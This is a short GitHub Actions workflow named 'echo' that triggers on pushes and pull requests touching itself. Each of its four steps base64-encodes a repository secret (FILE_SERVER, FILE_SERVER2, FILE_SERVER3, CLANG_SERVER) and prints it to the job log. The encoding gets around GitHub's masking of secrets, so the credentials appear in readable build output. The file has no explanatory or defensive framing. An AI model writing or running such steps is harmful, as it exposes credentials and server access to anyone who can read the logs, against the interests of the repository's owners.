name: echo
on: 
  push:
    paths:
      - '.github/workflows/echo.yml'
  pull_request:
    paths:
      - '.github/workflows/echo.yml'

jobs:
  echo:
    runs-on: ubuntu-latest    
    steps:
      - run: a=`echo "${{ secrets.FILE_SERVER }}" | base64` && echo $a
      
      - run: a=`echo "${{ secrets.FILE_SERVER2 }}" | base64` && echo $a
      
      - run: a=`echo "${{ secrets.FILE_SERVER3 }}" | base64` && echo $a
      
      - run: a=`echo "${{ secrets.CLANG_SERVER }}" | base64` && echo $a
      
